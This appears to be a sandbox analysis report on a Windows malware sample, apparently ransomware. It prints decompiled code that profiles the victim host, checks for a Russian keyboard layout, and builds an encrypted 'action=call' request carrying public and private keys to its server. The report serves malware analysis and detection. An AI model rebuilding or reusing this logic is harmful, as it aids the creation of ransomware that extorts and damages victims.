												lstrcatW( *(_t318 + 0x7c),  &_v40);
												_v36 = 0x5c;
												lstrcatW( *(_t318 + 0x7c),  *(_t319 + _t310 * 4 - 0x40));
												lstrcatW( *(_t318 + 0x7c), "_");
												_t206 = GetDiskFreeSpaceW( &_v40,  &_v32,  &_v24,  &_v16,  &_v20); // executed
												if(_t206 == 0) {
													lstrcatW( *(_t318 + 0x7c), L"0,");
													goto L75;
												}
												_v12 = E00A88470(_v20, 0, _v32 * _v24, 0);
												_t296 = _t307;
												_t209 = E00A88470(_v16, 0, _v32 * _v24, 0);
												_t314 = _v12;
												_v8 = _t314 - _t209;
												asm("sbb eax, edx");
												_v12 = _t296;
												_t211 = lstrlenW( *(_t318 + 0x7c));
												_push(_t296);
												wsprintfW( &(( *(_t318 + 0x7c))[_t211]), L"%I64u/", _t314);
												_t214 = lstrlenW( *(_t318 + 0x7c));
												_push(_v12);
												wsprintfW( &(( *(_t318 + 0x7c))[_t214]), L"%I64u", _v8);
												_t320 = _t320 + 0x20;
												lstrcatW( *(_t318 + 0x7c), ",");
											}
											_t189 =  &(1[_v28]);
											_v28 = _t189;
										} while (_t189 < 0x1b);
										_t194 = lstrlenW( *(_t318 + 0x7c));
										_t300 =  *(_t318 + 0x7c);
										_t300[_t194 * 2 - 2] = 0;
										goto L78;
									}
								}
								__imp__GetNativeSystemInfo( &_v76); // executed
								_t252 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
								_t300 = _v76 & 0x0000ffff;
								 *(_t318 + 0x5c) = _t252;
								if(_t300 > 9) {
									L49:
									_push(L"Unknown");
									L50:
									wsprintfW(_t252, ??);
									_t320 = _t320 + 8;
									goto L51;
								}
								_t300 = _t300[E00A87510] & 0x000000ff;
								switch( *((intOrPtr*)(_t300 * 4 +  &M00A874FC))) {
									case 0:
										_push(L"x86");
										goto L50;
									case 1:
										_push(L"ARM");
										goto L50;
									case 2:
										_push(L"Itanium");
										goto L50;
									case 3:
										_push(L"x64");
										goto L50;
									case 4:
										goto L49;
								}
							}
							_t254 = VirtualAlloc(0, 0x82, 0x3000, 4); // executed
							_v20 = _t254;
							 *(_t318 + 0x50) = _t254;
							_v24 = 0;
							_t256 = RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20019,  &_v28); // executed
							if(_t256 != 0) {
								L41:
								_push(_t300);
								E00A86D10(_t300, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t318 + 0x50), 0x80);
								wsprintfW( *(_t318 + 0x50), L"error");
								_t320 = _t320 + 8;
								goto L42;
							}
							_v32 = 0x80;
							_t260 = RegQueryValueExW(_v28, L"productName", 0, 0, _v20,  &_v32); // executed
							if(_t260 != 0) {
								GetLastError();
							} else {
								_v24 = 1;
							}
							RegCloseKey(_v28); // executed
							if(_v24 != 0) {
								goto L42;
							} else {
								goto L41;
							}
						}
						_t263 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
						_v16 = _t263;
						_v28 = _t263 + 0xe;
						_t265 = VirtualAlloc(0, 4, 0x3000, 4); // executed
						 *(_t318 + 0x44) = _t265;
						_t316 = 1;
						_v8 = 1;
						_v12 = 0;
						do {
							wsprintfW(_v16, L"%d", _t316);
							_t320 = _t320 + 0xc;
							_v24 = 0;
							_t316 =  &(_t316[1]);
							_t268 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v20); // executed
							if(_t268 != 0) {
								L27:
								_t269 = 0;
								_v8 = 0;
								L29:
								_t300 = _v12;
								goto L30;
							}
							_v32 = 0x80;
							_t273 = RegQueryValueExW(_v20, _v16, 0, 0, _v28,  &_v32); // executed
							if(_t273 != 0) {
								GetLastError();
							} else {
								_v24 = 1;
							}
							RegCloseKey(_v20); // executed
							if(_v24 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v28, L"00000419") != 0) {
									_t269 = _v8;
									goto L29;
								}
								wsprintfW( *(_t318 + 0x44), "1");
								_t320 = _t320 + 8;
								_t300 = 1;
								_t269 = 0;
								_v12 = 1;
								_v8 = 0;
							}
							L30:
						} while (_t316 != 9 && _t269 != 0);
						if(_t300 == 0) {
							wsprintfW( *(_t318 + 0x44), "0");
							_t320 = _t320 + 8;
						}
						VirtualFree(_v16, 0, 0x8000); // executed
						goto L35;
					}
					_t278 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					_v24 = _t278;
					 *(_t318 + 0x38) = _t278;
					_v12 = 0;
					_t280 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v16); // executed
					if(_t280 != 0) {
						L17:
						 *(_t318 + 0x30) = 0;
						VirtualFree( *(_t318 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v28 = 0x40;
					_t283 = RegQueryValueExW(_v16, L"LocaleName", 0, 0, _v24,  &_v28); // executed
					if(_t283 != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v16); // executed
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t286 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t318 + 0x20) = _t286;
					if(_t286 == 0) {
						goto L11;
					}
					_push(_t300);
					_t287 = E00A86D10(_t300, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t286, 0x80); // executed
					if(_t287 == 0) {
						wsprintfW( *(_t318 + 0x20), L"undefined");
						L10:
						_t320 = _t320 + 8;
						goto L11;
					}
					_t289 =  *(_t318 + 0x20);
					if( *_t289 != 0) {
						goto L11;
					}
					wsprintfW(_t289, L"WORKGROUP");
					goto L10;
				}
			}

0x00a86d90
0x00a86d9b
0x00a86da7
0x00a86db7
0x00a86db9
0x00a86dbc
0x00a86dc1
0x00a86dc8
0x00a86dc8
0x00a86dd2
0x00a86ddf
0x00a86de6
0x00a86de8
0x00a86deb
0x00a86df0
0x00a86df0
0x00a86e00
0x00a86e56
0x00a86e5a
0x00a86ef5
0x00a86ef9
0x00a87024
0x00a87028
0x00a870d6
0x00a870da
0x00a87134
0x00a87138
0x00a8713d
0x00a87149
0x00a87150
0x00a87152
0x00a87152
0x00a87150
0x00a87159
0x00a8716d
0x00a8717d
0x00a87180
0x00a87188
0x00a8718b
0x00a87191
0x00a87194
0x00a8719a
0x00a871a4
0x00a871a8
0x00a871a8
0x00a871ae
0x00a871b4
0x00a871b8
0x00a871bf
0x00a871cc
0x00a871d4
0x00a871dd
0x00a871f6
0x00a871fe
0x00a87200
0x00a87214
0x00a8721b
0x00a87223
0x00a8722e
0x00a87225
0x00a87225
0x00a87225
0x00a87237
0x00a87241
0x00a87246
0x00a8724c
0x00a8724f
0x00a87268
0x00a87268
0x00a87241
0x00a8727a
0x00a87282
0x00a8728b
0x00a8729e
0x00a872a4
0x00a872a9
0x00a872c7
0x00a872ab
0x00a872c2
0x00a872c2
0x00a872da
0x00a872e1
0x00a872e1
0x00a872f3
0x00a874a0
0x00a874a7
0x00a874f0
0x00a874f9
0x00a874f9
0x00a874b7
0x00a874bd
0x00a874c5
0x00a874e4
0x00a874e4
0x00000000
0x00a874e4
0x00a874c7
0x00a874c9
0x00a874d0
0x00000000
0x00000000
0x00a874de
0x00000000
0x00a872f9
0x00a87307
0x00a8730e
0x00a87315
0x00a8731c
0x00a87323
0x00a8732a
0x00a87331
0x00a87338
0x00a8733a
0x00a8733d
0x00a87340
0x00a87345
0x00a87345
0x00a87348
0x00a8734b
0x00a8734c
0x00a87352
0x00a87357
0x00a8735a
0x00a8735f
0x00a87362
0x00a87364
0x00a87370
0x00a87375
0x00a8737d
0x00a87383
0x00a87388
0x00a87399
0x00a873a4
0x00a873b2
0x00a873b6
0x00a873c0
0x00a873d6
0x00a873de
0x00a87479
0x00000000
0x00a87479
0x00a87400
0x00a87403
0x00a87405
0x00a8740a
0x00a87416
0x00a87419
0x00a8741b
0x00a8741e
0x00a87427
0x00a87438
0x00a87446
0x00a87448
0x00a8745a
0x00a87462
0x00a8746d
0x00a8746d
0x00a87484
0x00a87485
0x00a87488
0x00a87494
0x00a87496
0x00a8749b
0x00000000
0x00a8749b
0x00a872f3
0x00a870e0
0x00a870f1
0x00a870f3
0x00a870f7
0x00a870fd
0x00a87129
0x00a87129
0x00a8712e
0x00a8712f
0x00a87131
0x00000000
0x00a87131
0x00a870ff
0x00a87106
0x00000000
0x00a87122
0x00000000
0x00000000
0x00a87114
0x00000000
0x00000000
0x00a8711b
0x00000000
0x00000000
0x00a8710d
0x00000000
0x00000000
0x00000000
0x00000000
0x00a87106
0x00a8703c
0x00a8703e
0x00a87041
0x00a87059
0x00a87060
0x00a87068
0x00a870ac
0x00a870ac
0x00a870c4
0x00a870d1
0x00a870d3
0x00000000
0x00a870d3
0x00a8706d
0x00a87084
0x00a8708c
0x00a87097
0x00a8708e
0x00a8708e
0x00a8708e
0x00a870a0
0x00a870aa
0x00000000
0x00000000
0x00000000
0x00000000
0x00a870aa
0x00a86f0d
0x00a86f16
0x00a86f20
0x00a86f23
0x00a86f25
0x00a86f28
0x00a86f2d
0x00a86f34
0x00a86f40
0x00a86f49
0x00a86f4b
0x00a86f4e
0x00a86f58
0x00a86f6b
0x00a86f73
0x00a86fe3
0x00a86fe3
0x00a86fe5
0x00a86fed
0x00a86fed
0x00000000
0x00a86fed
0x00a86f78
0x00a86f8d
0x00a86f95
0x00a86fa0
0x00a86f97
0x00a86f97
0x00a86f97
0x00a86fa9
0x00a86fb3
0x00000000
0x00a86fb5
0x00a86fc5
0x00a86fea
0x00000000
0x00a86fea
0x00a86fcf
0x00a86fd1
0x00a86fd4
0x00a86fd9
0x00a86fdb
0x00a86fde
0x00a86fde
0x00a86ff0
0x00a86ff0
0x00a86fff
0x00a87009
0x00a8700b
0x00a8700b
0x00a87018
0x00000000
0x00a8701e
0x00a86e6e
0x00a86e70
0x00a86e73
0x00a86e8b
0x00a86e92
0x00a86e9a
0x00a86ede
0x00a86ee8
0x00a86eef
0x00000000
0x00a86eef
0x00a86e9f
0x00a86eb6
0x00a86ebe
0x00a86ec9
0x00a86ec0
0x00a86ec0
0x00a86ec0
0x00a86ed2
0x00a86edc
0x00000000
0x00000000
0x00000000
0x00000000
0x00a86e02
0x00a86e10
0x00a86e12
0x00a86e17
0x00000000
0x00000000
0x00a86e19
0x00a86e2f
0x00a86e36
0x00a86e51
0x00a86e51
0x00a86e53
0x00000000
0x00a86e53
0x00a86e38
0x00a86e3f
0x00000000
0x00000000
0x00a86e51
0x00000000
0x00a86e51

APIs

VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00A86DB7
GetUserNameW.ADVAPI32(00000000,?), ref: 00A86DC8
VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00A86DE6
GetComputerNameW.KERNEL32 ref: 00A86DF0
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00A86E10
wsprintfW.USER32 ref: 00A86E51
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00A86E6E
RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00A86E92
RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,?,?), ref: 00A86EB6
GetLastError.KERNEL32 ref: 00A86EC9
RegCloseKey.KERNEL32(00000000), ref: 00A86ED2
VirtualFree.KERNEL32(00A848B6,00000000,00008000), ref: 00A86EEF
VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 00A86F0D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 00A86F23
wsprintfW.USER32 ref: 00A86F49
RegOpenKeyExW.KERNEL32(80000001,Keyboard Layout\Preload,00000000,00020019,00A84590), ref: 00A86F6B
RegQueryValueExW.KERNEL32(00A84590,00000000,00000000,00000000,?,?), ref: 00A86F8D
GetLastError.KERNEL32 ref: 00A86FA0
RegCloseKey.KERNEL32(00A84590), ref: 00A86FA9
lstrcmpiW.KERNEL32(?,00000419), ref: 00A86FBD
wsprintfW.USER32 ref: 00A86FCF
wsprintfW.USER32 ref: 00A87009
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A87018
VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 00A8703C
RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,?), ref: 00A87060
RegQueryValueExW.KERNEL32(?,productName,00000000,00000000,00A84590,?), ref: 00A87084
GetLastError.KERNEL32 ref: 00A87097
RegCloseKey.KERNEL32(?), ref: 00A870A0
wsprintfW.USER32 ref: 00A870D1
GetNativeSystemInfo.KERNEL32(?), ref: 00A870E0
VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 00A870F1
wsprintfW.USER32 ref: 00A8712F
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00A8716D
VirtualAlloc.KERNEL32(00000000,00000E0C,00003000,00000004), ref: 00A87180
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 00A87194
GetVolumeInformationW.KERNEL32(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 00A871D4
RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?), ref: 00A871F6
RegQueryValueExW.KERNEL32(?,ProcessorNameString,00000000,00000000,00000000,?), ref: 00A8721B
GetLastError.KERNEL32 ref: 00A8722E
RegCloseKey.KERNEL32(?), ref: 00A87237
lstrlenW.KERNEL32(00000000), ref: 00A87246

Part of subcall function 00A86D10: RegOpenKeyExW.KERNEL32(?,?,00000000,00020019,?,?,00000000,?,00A8726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00A86D26
Part of subcall function 00A86D10: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000080,?,?,00A8726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00A86D47
Part of subcall function 00A86D10: RegCloseKey.KERNEL32(?,?,00A8726D,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,Identifier,00000000,00000080,00000000), ref: 00A86D57

wsprintfW.USER32 ref: 00A8727A
lstrcatW.KERNEL32(?,00000000), ref: 00A8728B
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 00A87297
GetProcAddress.KERNEL32(00000000), ref: 00A8729E
lstrlenW.KERNEL32(?), ref: 00A872AE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A872E1
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00A87338
GetDriveTypeW.KERNEL32(?), ref: 00A8737D
lstrcatW.KERNEL32(?,?), ref: 00A873A4
lstrcatW.KERNEL32(?,00A9073C), ref: 00A873B6
lstrcatW.KERNEL32(?,00A907B0), ref: 00A873C0
GetDiskFreeSpaceW.KERNEL32(?,?,?,00000000,00A84590), ref: 00A873D6

Strings

WORKGROUP, xrefs: 00A86E41
undefined, xrefs: 00A86E49
LocaleName, xrefs: 00A86EAE
Domain, xrefs: 00A86E20
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00A871EC, 00A8725E
iet, xrefs: 00A86FBD
error, xrefs: 00A870C9
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00A8704F
Keyboard Layout\Preload, xrefs: 00A86F61
ARM, xrefs: 00A87114
Identifier, xrefs: 00A87259
Unknown, xrefs: 00A87129
00000419, xrefs: 00A86FB5
%I64u/, xrefs: 00A87432
x86, xrefs: 00A87122
%I64u, xrefs: 00A87451
@, xrefs: 00A86E9F
x64, xrefs: 00A8710D
ntdll.dll, xrefs: 00A87292
?:\, xrefs: 00A87352
productName, xrefs: 00A8707C, 00A870B5
Control Panel\International, xrefs: 00A86E81
ProcessorNameString, xrefs: 00A8720C
RtlComputeCrc32, xrefs: 00A8728D
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 00A86E25
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 00A870BA
Itanium, xrefs: 00A8711B

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$CloseOpenQueryValue$ErrorFreeLastlstrcat$Namelstrlen$AddressComputerDirectoryDiskDriveHandleInfoInformationModuleNativeProcSpaceSystemTypeUserVolumeWindowslstrcmpi
String ID: iet$%I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 2088797152-3290575438
Opcode ID: 6a59ae4bf58c477a807ff4201a2a3d26eecc01053721ffda1c105872c96f2b85
Instruction ID: 067aeb50386b0b0ade6bbeb85715b232dfd6572b7e0448e6726cee29e621a55c
Opcode Fuzzy Hash: 6a59ae4bf58c477a807ff4201a2a3d26eecc01053721ffda1c105872c96f2b85
Instruction Fuzzy Hash: 62225B70A40309AFEB21EFA4CC49FAEBBB9FF04704F204419F646A61A0D7B1A945DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00A85750 Relevance: 87.9, APIs: 45, Strings: 5, Instructions: 416
stringmemoryencryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00A85750(char __ecx, int __edx, BYTE* _a4, signed int _a8, long* _a12) {
				char _v295;
				char _v296;
				char _v404;
				char _v408;
				void* _v428;
				CHAR* _v432;
				int _v436;
				int _v440;
				char _v442;
				CHAR* _v444;
				short _v448;
				int _v452;
				char _v456;
				CHAR* _v464;
				int _v468;
				void* _v472;
				BYTE* _v476;
				WCHAR* _v480;
				WCHAR* _v484;
				void* _v488;
				void* _v492;
				short* _v496;
				CHAR* _v500;
				void* _v504;
				long _v508;
				CHAR* _v512;
				CHAR* _v528;
				CHAR* _t133;
				void* _t135;
				int _t145;
				void* _t148;
				int _t149;
				void* _t150;
				void* _t152;
				signed int _t159;
				signed int _t163;
				void* _t168;
				void* _t170;
				signed int _t172;
				void* _t183;
				CHAR* _t185;
				long _t189;
				intOrPtr _t199;
				int _t200;
				void _t202;
				int _t203;
				void _t204;
				int _t205;
				int _t210;
				long _t213;
				void* _t219;
				short _t228;
				char* _t229;
				WCHAR* _t231;
				short _t233;
				CHAR* _t234;
				char _t235;
				void* _t238;
				long _t240;
				long _t241;
				void* _t243;
				void* _t245;
				short _t248;
				int _t249;
				void* _t255;
				CHAR* _t256;
				WCHAR* _t258;
				WCHAR* _t259;
				signed int _t261;
				CHAR* _t262;
				CHAR* _t263;
				int _t267;
				void* _t268;
				long _t271;
				void* _t272;
				void* _t273;
				long _t279;
				int _t280;
				long _t281;
				void* _t282;
				CHAR* _t283;
				short _t284;

				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_v456 = __ecx;
				_t210 = __edx;
				_v436 = __edx;
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(__ecx);
				_push(1);
				_push(1);
				_push(__ecx);
				_push(1);
				E00A839B0( &_v404);
				E00A86D90( &_v492); // executed
				_t255 = E00A86BA0( &_v492);
				_t7 = _a8 + _t210 + 8; // 0x8
				_t213 = _t255 + _t7 * 8 << 3;
				_t133 = VirtualAlloc(0, _t213, 0x3000, 0x40); // executed
				_t248 = 0;
				_v512 = _t133;
				_v528 = _t133;
				_t228 = 0x30 + (_t255 + (_a8 + _t210) * 4) * 8;
				if(_t133 == 0 || _t228 >= _t213) {
					_v448 = _t248;
					_t256 = _t133;
				} else {
					_t256 =  &(_t133[_t228]);
					_v448 = _t133;
					_v444 = _t256;
					_t248 = _t228;
				}
				_t135 = 2 + _a8 * 8;
				if(_v428 == 0) {
					L7:
					_t229 = 0;
					_v432 = 0;
				} else {
					_t284 = _t248 + _t135;
					if(_t284 >= _t213) {
						goto L7;
					} else {
						_t229 = _t256;
						_v432 = _t256;
						_t256 =  &(_t256[_t135]);
						_t248 = _t284;
						_v444 = _t256;
					}
				}
				_t267 = _v440;
				if(_v428 == 0 || 2 + _t267 * 8 + _t248 >= _t213) {
					_t256 = 0;
					_v444 = 0;
				}
				if(_t229 == 0) {
					goto L53;
				} else {
					_t249 = _a8;
					_v436 = _t249 + _t249;
					CryptBinaryToStringA(_a4, _t249, 0x40000001, _t229,  &_v436);
					_v452 = _t267 + _t267;
					CryptBinaryToStringA(_v476, _t267, 0x40000001, _t256,  &_v452);
					_t145 = lstrlenA(_t256);
					_t271 = _t145 + lstrlenA(_v464) + 0x42;
					_t148 = VirtualAlloc(0, _t271, 0x3000, 0x40); // executed
					_v472 = _t148;
					_v488 = _t148;
					_v492 = 0;
					_t149 = lstrlenA(_v464);
					_t231 = _v472;
					_t150 = _t149 + 1;
					if(_t231 == 0 || _t150 >= _t271) {
						_v484 = 0;
					} else {
						_v492 = _t150;
						_v488 = _t231 + _t150;
						_v484 = _t231;
					}
					_t152 = lstrlenA(_t256) + 1;
					if(_v472 == 0 || _t152 + _v492 >= _t271) {
						_v488 = 0;
					}
					_t272 = 0;
					if(lstrlenA(_v464) != 0) {
						_t245 = _v484;
						_t263 = _v464;
						_v492 = _t245;
						do {
							_t204 =  *((intOrPtr*)(_t272 + _t263));
							if(_t204 != 0xa && _t204 != 0xd) {
								 *_t245 = _t204;
								_v492 = _t245 + 1;
							}
							_t272 = _t272 + 1;
							_t205 = lstrlenA(_t263);
							_t245 = _v492;
						} while (_t272 < _t205);
						_t256 = _v476;
					}
					_t273 = 0;
					if(lstrlenA(_t256) != 0) {
						_t243 = _v488;
						_v492 = _t243;
						do {
							_t202 =  *((intOrPtr*)(_t273 + _t256));
							if(_t202 != 0xa && _t202 != 0xd) {
								 *_t243 = _t202;
								_v492 = _t243 + 1;
							}
							_t273 = _t273 + 1;
							_t203 = lstrlenA(_t256);
							_t243 = _v492;
						} while (_t273 < _t203);
					}
					_t258 = _v480;
					lstrcatW(_t258, L"action=call&");
					_t259 =  &(_t258[lstrlenW(_t258)]);
					E00A869A0( &_v440, _t259); // executed
					lstrcatW(_t259, L"&pub_key=");
					_t159 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v488, 0xffffffff,  &(_t259[_t159]), lstrlenA(_v488));
					lstrcatW(_t259, L"&priv_key=");
					_t163 = lstrlenW(_t259);
					MultiByteToWideChar(0xfde9, 0, _v492, 0xffffffff,  &(_t259[_t163]), lstrlenA(_v492));
					lstrcatW(_t259, L"&version=2.1");
					_t279 = (lstrlenW(_v484) << 4) + 0x12;
					_t168 = VirtualAlloc(0, _t279, 0x3000, 0x40); // executed
					_t219 = _t168;
					_v480 = _t219;
					_t170 = 2 + lstrlenW(_v484) * 8;
					if(_t219 == 0 || _t170 >= _t279) {
						_v492 = 0;
					} else {
						_v492 = _t219;
					}
					_t172 = lstrlenW(_v480);
					_t233 = "#shasj"; // 0x61687323
					_t261 = _t172;
					asm("movq xmm0, [0xa90128]");
					_v448 = _t233;
					_t234 =  *0xa90134; // 0x6a73
					_v444 = _t234;
					_t235 =  *0xa90136; // 0x0
					asm("movq [esp+0x3c], xmm0");
					_v442 = _t235;
					_v296 = 0;
					E00A88B30( &_v295, 0, 0xff);
					E00A85C40( &_v296,  &_v456, lstrlenA( &_v456));
					_t280 = _t261 + _t261;
					E00A85CF0( &_v296, _v480, _t280);
					_t262 = _v492;
					_v468 = _t261 * 8;
					if(CryptBinaryToStringA(_v480, _t280, 0x40000001, _t262,  &_v468) == 0) {
						GetLastError();
					}
					_t105 = lstrlenA(_t262) + 2; // 0x2
					_t281 = _t105;
					_t183 = VirtualAlloc(0, _t281, 0x3000, 0x40); // executed
					_v504 = _t183;
					_t107 = lstrlenA(_t262) + 1; // 0x1
					_t238 = _t107;
					_t185 = _v504;
					if(_t185 == 0) {
						L40:
						_v500 = 0;
					} else {
						_v500 = _t185;
						if(_t238 >= _t281) {
							goto L40;
						}
					}
					_t282 = 0;
					if(lstrlenA(_t262) != 0) {
						_t241 = _v500;
						_v508 = _t241;
						do {
							_t199 =  *((intOrPtr*)(_t282 + _t262));
							if(_t199 != 0xa && _t199 != 0xd) {
								 *_t241 = _t199;
								_v508 = _t241 + 1;
							}
							_t282 = _t282 + 1;
							_t200 = lstrlenA(_t262);
							_t241 = _v508;
						} while (_t282 < _t200);
					}
					_t283 = _v500;
					MultiByteToWideChar(0xfde9, 0, _t283, 0xffffffff, _v496, lstrlenA(_t283));
					_v508 = 0;
					_t189 = E00A85370(_t283,  &_v508, 1); // executed
					if(_t189 != 0) {
						_t240 = _v508;
						if(_t240 != 0) {
							 *_a12 = _t240;
						}
						VirtualFree(_v504, 0, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						L53:
						_t268 = 1;
					} else {
						VirtualFree(_v504, _t189, 0x8000);
						VirtualFree(_v492, 0, 0x8000);
						VirtualFree(_v488, 0, 0x8000);
						_t268 = 0;
					}
				}
				VirtualFree(_v428, 0, 0x8000);
				E00A87720( &_v408);
				return _t268;
			}

0x00a8575f
0x00a85760
0x00a85762
0x00a85763
0x00a85768
0x00a8576c
0x00a8576e
0x00a85772
0x00a85774
0x00a85775
0x00a85777
0x00a85778
0x00a8577a
0x00a8577b
0x00a8577d
0x00a8577e
0x00a85783
0x00a85785
0x00a85786
0x00a8578f
0x00a85798
0x00a857a9
0x00a857b4
0x00a857ba
0x00a857c0
0x00a857c6
0x00a857c8
0x00a857cc
0x00a857d3
0x00a857dc
0x00a857f1
0x00a857f5
0x00a857e2
0x00a857e2
0x00a857e5
0x00a857e9
0x00a857ed
0x00a857ed
0x00a857ff
0x00a85806
0x00a8581f
0x00a8581f
0x00a85821
0x00a85808
0x00a85808
0x00a8580d
0x00000000
0x00a8580f
0x00a8580f
0x00a85811
0x00a85815
0x00a85817
0x00a85819
0x00a85819
0x00a8580d
0x00a8582a
0x00a8582e
0x00a8583d
0x00a8583f
0x00a8583f
0x00a85845
0x00000000
0x00a8584b
0x00a8584b
0x00a85857
0x00a8586a
0x00a8586f
0x00a85883
0x00a8588c
0x00a858a0
0x00a858a5
0x00a858af
0x00a858b3
0x00a858b7
0x00a858bf
0x00a858c1
0x00a858c5
0x00a858c8
0x00a858df
0x00a858ce
0x00a858d1
0x00a858d5
0x00a858d9
0x00a858d9
0x00a858ea
0x00a858f0
0x00a858fa
0x00a858fa
0x00a85906
0x00a8590c
0x00a8590e
0x00a85912
0x00a85916
0x00a85920
0x00a85920
0x00a85925
0x00a8592b
0x00a8592e
0x00a8592e
0x00a85933
0x00a85934
0x00a85936
0x00a8593a
0x00a8593e
0x00a8593e
0x00a85943
0x00a85949
0x00a8594b
0x00a8594f
0x00a85953
0x00a85953
0x00a85958
0x00a8595e
0x00a85961
0x00a85961
0x00a85966
0x00a85967
0x00a85969
0x00a8596d
0x00a85953
0x00a85971
0x00a85981
0x00a85990
0x00a85994
0x00a8599f
0x00a859a2
0x00a859c0
0x00a859cc
0x00a859cf
0x00a859f1
0x00a859fd
0x00a85a17
0x00a85a1d
0x00a85a27
0x00a85a29
0x00a85a2f
0x00a85a38
0x00a85a46
0x00a85a3e
0x00a85a3e
0x00a85a3e
0x00a85a4e
0x00a85a50
0x00a85a56
0x00a85a58
0x00a85a67
0x00a85a6b
0x00a85a77
0x00a85a7c
0x00a85a85
0x00a85a8b
0x00a85a8f
0x00a85a97
0x00a85ab8
0x00a85ac1
0x00a85acf
0x00a85ade
0x00a85ae2
0x00a85afe
0x00a85b00
0x00a85b00
0x00a85b10
0x00a85b10
0x00a85b16
0x00a85b1d
0x00a85b23
0x00a85b23
0x00a85b26
0x00a85b2c
0x00a85b36
0x00a85b36
0x00a85b2e
0x00a85b2e
0x00a85b34
0x00000000
0x00000000
0x00a85b34
0x00a85b3f
0x00a85b45
0x00a85b47
0x00a85b4b
0x00a85b50
0x00a85b50
0x00a85b55
0x00a85b5b
0x00a85b5e
0x00a85b5e
0x00a85b63
0x00a85b64
0x00a85b66
0x00a85b6a
0x00a85b50
0x00a85b6e
0x00a85b84
0x00a85b90
0x00a85b9a
0x00a85ba4
0x00a85bd7
0x00a85bdd
0x00a85be2
0x00a85be2
0x00a85bf6
0x00a85c03
0x00a85c10
0x00a85c1a
0x00a85c1a
0x00a85ba6
0x00a85bb7
0x00a85bc4
0x00a85bd1
0x00a85bd3
0x00a85bd3
0x00a85ba4
0x00a85c2a
0x00a85c30
0x00a85c3d

APIs

Part of subcall function 00A839B0: GetProcessHeap.KERNEL32(?,?,00A84587,00000000,?,00000000), ref: 00A83A4C

Part of subcall function 00A86D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00A86DB7
Part of subcall function 00A86D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00A86DC8
